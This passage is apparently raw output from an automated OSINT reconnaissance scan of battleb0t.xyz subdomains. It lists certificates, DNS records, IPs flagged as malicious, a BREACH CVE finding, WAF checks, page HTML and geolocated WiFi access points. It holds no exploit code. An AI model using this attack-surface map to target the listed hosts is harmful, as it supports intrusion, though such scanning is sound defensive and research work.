30:46:02:21:00:A0:8D:98:FA:F9:D9:C8:59:5F:87:D3:
BB:68:8E:C2:BB:E7:07:F3:66:F0:BF:C4:32:F7:17:14:
85:A0:6B:D1:81:02:21:00:E1:E7:8A:92:A4:1B:C4:8C:
79:7C:C9:6A:17:B8:C7:84:C4:57:6B:7F:E9:88:F3:FA:
7F:17:65:61:BF:48:50:7D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Nov 17 10:44:02.268 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8A:CF:A1:DE:F1:EC:82:39:97:4B:3B:
E7:19:AD:34:CE:C3:F8:D5:48:1A:55:78:09:18:4D:A5:
36:34:CF:46:A1:02:20:77:AE:18:F8:2D:70:F3:32:66:
62:44:0D:F1:40:70:3E:89:21:C3:7B:CF:8C:98:9B:A8:
93:78:E1:26:FD:75:C4
Signature Algorithm: sha256WithRSAEncryption
85:47:39:10:69:02:19:cb:50:8c:08:91:e6:11:b3:5f:9d:fa:
b8:b1:83:e5:ff:e8:1d:ed:c5:00:66:a8:84:ff:8c:00:23:34:
e3:46:98:32:83:6e:3d:e3:58:01:45:e8:a3:86:95:02:4e:5e:
0c:2e:72:f2:22:72:8e:a0:b1:06:5d:d0:13:ed:5c:d8:a1:70:
83:1c:43:aa:b9:57:4d:3c:0c:d8:a7:d4:a3:f6:94:cb:e4:d0:
4b:e5:4b:8f:fc:90:9f:6a:f2:f7:82:9b:08:f2:f3:44:1b:86:
18:89:5e:72:af:ca:a9:09:1e:e2:c5:ae:e1:9c:e5:9c:5e:66:
8e:8b:22:8a:36:54:2a:4e:6a:d6:82:11:53:86:c5:74:e3:90:
90:6f:46:a5:ce:07:f8:45:77:70:d4:77:73:14:c3:71:96:31:
7a:30:09:e0:7b:e0:e8:34:13:61:49:d3:bf:fa:aa:2e:da:45:
5f:25:e3:22:f8:d8:94:10:30:4c:38:a3:69:e5:a9:44:0f:99:
ab:4f:8a:ac:8b:23:68:e6:f5:dc:3a:a2:45:58:75:61:f0:50:
88:14:ff:16:c7:72:ba:24:24:ed:84:3a:6f:d4:e8:8e:26:df:
24:ff:a8:40:5d:67:21:98:6b:ad:ae:da:d7:ae:81:57:3d:a1:
46:7c:24:9a
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0B:6B:11:48:DC) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Destructoid (Category: social)
https://www.destructoid.com/?name=login | login |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 80 | 0 | 2 | 0 | None | 34.74.170.74 | funny.battleb0t.xyz |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
|
| 2023-05-12 02:51:54 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [104.21.71.14]
https://www.virustotal.com/en/ip-address/104.21.71.14/information/ | 104.21.71.14 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.106 | 35.229.48.116 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | THW (Net ID: 00:02:6F:DF:78:B4) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | belkin54g (Net ID: 00:17:3F:83:7B:BA) | 32.8608, -79.9746 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | https://ayhu.xyz/lol.html | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="fXRp0MT2Gq_7yIcIgnBHmz4mvl642t3xYxkCV5CopVU-1683861861-0-AevD5zHzR5Nylhg7VMHylWA-UGhfY5JI7t_DZKLajlY04sfvOKhEUvL9GVGicMZplZkcd7EKnpXCooBz_psnEdyw4NmTFN3sNXxO3b2NuDlfX3fgFqIYYwxN-_ZcrgInEcSdq4ze85lgbNjmAyI7cICej2859mTsNPJTSg3Eei4MCiIEepygARCAmXkyjazT_siRWXRbIF3Yq9cQrkKvTYHjy7kA4ARUBhj3gHLsfY6ByHmcA-4oH5F_BMaNFfn83ZbE-O4HF1luYDVMX4jN2SY5BFBmGirV5lQE7nc2ET_G_HywU7GlMXbT0JmkojLsvRDxpqP_ZBtz_vJHbi4FUOHHRaxbF6WI1ct7U2kIlltKjNHrBNnSQ1zRICZ4xPEiXCRFEqv1mvMk_vuWumbRs70YeoiNBWGJjw9SNPC0qRv0_rQzWEhzAZCr9GR45Pyn22x2UzlVIl478oJoBXIxbm7A_QBYYHzFjMNgE8pR4rE43z-LkzbfZp4Mrz4ipAVKmZJGkf2Y5B_9TlYOJXKMjDFy4LD0ELxkw1-R_QW_mLtVmznveG5c9m2IZ2zQV1cn4H8j5Bc1iY811MUNVsmFG0JD-DYsguU4LRfDkaOmbWCSaJ34wnyswYZY6vuAq7jQcIjqzclxyNRihA5I_cL6ueo4Ri5oVSncrTfIsWIYMESFPA-cZy_mtxt3SdM8IrciE1x1sYi06n9I6prGHl0s-4QNR7JVOnbdMoI28ES-j7HwNWZk4MsUxFuzUOsk5lSLsSRh-hQZxr19nktp-MvVpSzRUuSL26nuxNFkN8FTk5Ae96R-Z683yfnj1pOwmIp-ezEp2JWb8TkZZ0zoMJBnNWz-dER92U4KjRMwAWRs684SongNmPEIXYAgqclvfJ3msrReLNbVn2C0cz7wvPKboCqEwy5ipFMXgNiuhbJpqavDTbOw2pcmk4nLwQO7-0fq6lR-AioIh72_7f-dcCDyp3CvaV2lSxONdGbwSj69Uzxdx9pjqKiA7eKWgpDp1A1TT4OM1UPvdKoDNlfXS-kt53TGtcDj_tr5ZSCxVfBj5Eaq6vy-dzTe3un5fL0Jw93IdI7hmq3BtVNMvvG3ttwva1yDFbKbbzAoei-_xuiypX7ONnqllk5lT1u_-s9W-YqxnvXblOasj5xt36xai8HGELg30c69mi7dS6KFtoe8onnoqh_Jv5x6H6CEBPpBlJkQ-7Wml_gwi2q6d0tQ_ZdaaMoOXxHsxIyK5qGvyrxIKQoaob4JTcbfXfzc5V6fJoXtr9RSoGgPAroX9StxeMfnAcZJZ38lwB2R_OkZXBx7EFcRTvZsqwNSAcBE597i5gxzUV9OIg9fnTaoLIGC6pMfXSOrCdhVP4gGEX4Bccu5X10qZzo6Szn5JgpstSZeqAMVuU9TWGPYdK5uOwlHRiWmjX7UntfXmsGqJLQN_MyyArtIqHW_GuUvvub4g6fNvemcAOPIu9NS3HWmMTmUN4ACMa423i12vOJGRP7TcmceYbGSntTQh51WDUHuY7LdwoWtDpwMlk9-stOh87SR4LOrDyvW1iZRowgiTy2GmxHJlIHKCRhXnA5KaH4pnPJkKkhrPoRN6DTCQDr15qpBgZxUmF4wezI7yU8i7hxFvjA2vpTMuEjzuFK5Xab8ZS1nR5YLbQiKD3ROG0S6bl-4nxyf66OU-8Xv4FaugupxS3e-wlAwiX3hxmLNdGdmQn9eyC4_2RwUK2WWp5b7e4SAi9-pAVBzMefue3T2KHTLHF643icuFWjUauohcHM9aP5V8YQkXvauXJeiafKXSGCb142muLvzgJ9tWui0nHCx7aGYnZ5KCXJJAPsMf9OR8piOc-bOw90DQdaaAoQce9uq1wQGOtC7qhcYnC54DqDoEYzADwA9eHH9CWAG4K79Bs3Vtk5_YaWGKevDuxwe2PI4tgDIlPhm0aaMmefu_Aqbmk6Nh3efYd6tebEuF1GGAbp894vPoKIV_oMOG4605Orlbta-mL3BdBLdomEjXGBNzJc8zOt_diWLDMArzlhmqHj68HR17Jaa_r6ERT_jArQXozZtM_B3L5O8SpcafOJWm3x_EH-cSS-ttAlAlAFa0wgnswXzQF8jvtcMH7wOU4U6LjP8DMTOtT18J0nltl0j_q-DNG4lBHonjmIjyRSP8oBxk-3z89_7YNTov0awtqgzLFZw2_mSARwNl4_HaPezvCevT53qGnFReXcG3RzOMm4zSBZbENl_DwydIdBN0QqU0z3ekKIj0DHHzeDbwvLRQiV0Lv01I4DZBYzgAdCYmkN3aWrG0sAU92LemS02Ukd_enHt1XRhTQOnUlyr42CJb5OOWo8CjNFcGn16guPRfUma268s38K2-wnhjS9iCXiymmGF-AAdAizqUKdabbQOSsatJ602VLlNMiwTbinDbOME_fkBdTGzKnt5g_beyji9YWF9g5kjIdThtdFTLZ7VtxqQe64uUOYy3ZMXGyBjPj32wUf-c45ZB1IslXSI3TZ3dwmgQZ-iw9MFsb5EQblUq7mhT6th">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'eSl90ERW3ieYQBiJ/CvInfpugLrCuGqtrxfN7Hff3XV1tnjtcokhOvtXLaw36vmuW/PZRZbPFRsBG1FZ2o1L9/qlyM29SttBrPr40sLGiM5zROAIfmkLKaU7gxLqLGeRmXOxLm0iruqXtWXcZfwzLJMR0QDa6PkszA2FQ43qwQdSl1Fas7lyf05ZYuhd21mKW7cO3qwZeh7EGOKQrSA2vqJVYFosW/VZvSBGX51hzStLgJo3UlZTpeKFoRGBNXR72ajQEJiUb1nCtKKxYTlVZS5ZMnpJ22NtZ33eAOm1lxwFp0ZWMwtEtyfr7+KjIQ7sSru0tnVtRMYbJHwTDL1YqCRM5I3BrwhMSJldfYZdxbXvKROe8SujCKguS6whGqpyPhrBZ0ynuTVosC8rK1X1RTGfwKn+lPWLzhRyW3E937dmzZ7Hr4MVk+jCtkCg7+HiFEo7Z5MPv1Dw/bUNeEjjhnMO6Bk/fpz1g8p9agnrrAYImdotjjffG+sx7LYboUY2eNvy7Cmsh5FjNxiOeltcpgD/DjxarQtoa+6blRoBMw8jV7vrsKw7K7t0fZ6oSnZa',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-110-154.github.com | 185.199.110.154 |
| 2023-05-12 03:33:51 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | eKE>Q
RQEA<
QEQAE
G$rG$
Z?xV
_2H-
-EEO1AE
e.coC
?wX3
QE_1<
QEhO0QE
QEAAE
rGDpyt
cv>myz
kPIiG
X?wV<
\u2v5
Qc>ft1
TtV@I
iY>eI
OYIXf
QPO0QE
P_0QK
2 ?w'
yrW'<
Au$rV7:
eirlI
GZrGQ
?wXRx
iVv5:
DrTty
eIAv$
QsRz<
rVw6J
G$uCU
yJrGU$
kweG$
vGCDoU
rI$wwq
MQIIL
u<rT4
P"ZO2
lkGRy
O<rGi
>:e>:9L
Uy?wF
<rOk$
WrXjPA
eii:<
rTr_i
EST4U
O1Pfg
kG$u<
QEKA!E
QQ-IJ66
2MJ9'
DrTtP
i$un<
4y 2>>
ZIc$q
wRk2G'
drUE\
AuXPOS
DtQA<
iu$pO
RJzQ$tP_1-
DtQAAE
-Q$U-
fO0QE
Cwkww
WS/xw
"J_2H
\rU -d
i7PZG
XZi>e
rT7qX
O2M:O
:eADT
_1-EE
j/"J_
T5/ x
\ebnT
v2Acu
0IZpI
?>?2J
wU-rV
tyubH
-.Kx<
2I<rZ
g\u2ld
EEKE_1<
6g$cy
\uBI?wPO<
GDub:<
"?.?>8
E6Ju!
tIIA1
IRytyq
_Gwq<
rm6?" | https://funny.battleb0t.xyz/images/nomnom.jpg |
| 2023-05-12 02:46:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | vscode.battleb0t.xyz |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | funny.battleb0t.xyz | [{"url": "https://funny.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SYNC_XP99MRWR (Net ID: 00:26:B4:2E:5E:DC) | 37.751, -97.822 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
57:fc:9c:cc:34:05:33:b1:85:6f:05:be:91:2e:7e:dc:3a:5c:
d5:70:d3:bc:68:4c:e5:a6:0e:93:49:4c:b2:24:ea:22:6c:53:
1d:7b:22:13:3e:ae:d1:e9:17:1e:71:5b:5a:e3:c7:59:55:db:
f6:e5:0f:f7:75:49:45:9c:0b:d7:10:90:aa:9f:57:81:e1:bd:
95:72:69:1a:6a:68:d7:6f:63:d3:d0:c5:74:e1:f6:05:01:8e:
de:8a:f2:cc:6b:66:ed:6a:cf:b9:08:1c:41:e7:01:36:39:29:
3c:ce:b9:d5:71:4f:4a:e1:92:00:38:14:85:83:1b:78:d3:52:
4d:9c:dc:62:c1:ff:3e:c9:3b:f4:1b:55:62:89:22:10:52:f5:
2f:09:06:3f:72:98:2a:6c:4f:3e:41:69:f0:90:3d:75:67:0f:
5f:95:04:35:0b:5e:5e:d4:29:7e:f0:df:9c:7f:86:0a:bf:f4:
66:2a:ad:8c:e5:22:e0:2d:ff:f7:04:45:a4:bb:31:8c:99:a5:
16:da:1d:eb:c6:c4:fa:e4:70:84:9c:c6:93:f8:76:5a:3a:48:
95:d4:c6:4d:4c:36:eb:b7:e5:52:69:e6:7d:0f:b5:d1:ab:44:
b8:82:08:6c:6a:ef:3e:4f:de:99:6f:c7:4e:1e:39:17:26:6f:
a6:80:e5:c2
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} |
| 2023-05-12 03:08:29 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.109.153 |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-14n.github.io |
| 2023-05-12 02:46:17 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [172.67.168.252] | 172.67.168.252 |
| 2023-05-12 02:52:56 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://kekw.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | kekw.battleb0t.xyz |
| 2023-05-12 02:54:30 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.80.0/20 | 64.226.81.43 |
| 2023-05-12 02:46:11 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | San Jose, United States | 104.21.71.14 |
| 2023-05-12 02:50:28 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 5493005GJOH8HLL11157 | Go Daddy, LLC |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.240): Search Engine
Last Activity: 0 days ago
